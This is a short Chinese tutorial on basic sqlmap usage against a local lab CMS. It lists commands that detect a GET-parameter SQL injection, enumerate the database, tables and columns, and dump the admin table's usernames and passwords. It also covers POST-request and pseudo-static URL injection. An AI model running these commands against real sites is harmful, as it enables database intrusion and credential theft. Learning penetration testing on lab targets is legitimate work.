sqlmap简单使用

最后都变了- 提交于 2019-12-02 23:37:44

get型

判断注入点

python sqlmap.py -u http://127.0.0.1/jdy/typeid.php?typeid=1

 

 

 

1、 获取当前数据库

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" --current-db --dbms mysql

 

 

 

2、 获取表

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" --dbms mysql --batch --tables

 

 

 

3、 获取指定表中字段名

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" -T "jdy_admin" --columns

 

 

 

4、 获取字段内容

python sqlmap.py -u "http://127.0.0.1/jdy/typeid.php?typeid=1" -D "jdycms" -T "jdy_admin" -C "username,password" --dump

 

 

 

post型; 将所拦截的包保存到本地

python sqlmap.py -r C:\Users\gyf\Desktop\post.txt -p "id"

 

 

 

 

 

伪静态页面注入

python sqlmap.py -u http://127.0.0.1/weijingtai/1*.html

 

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!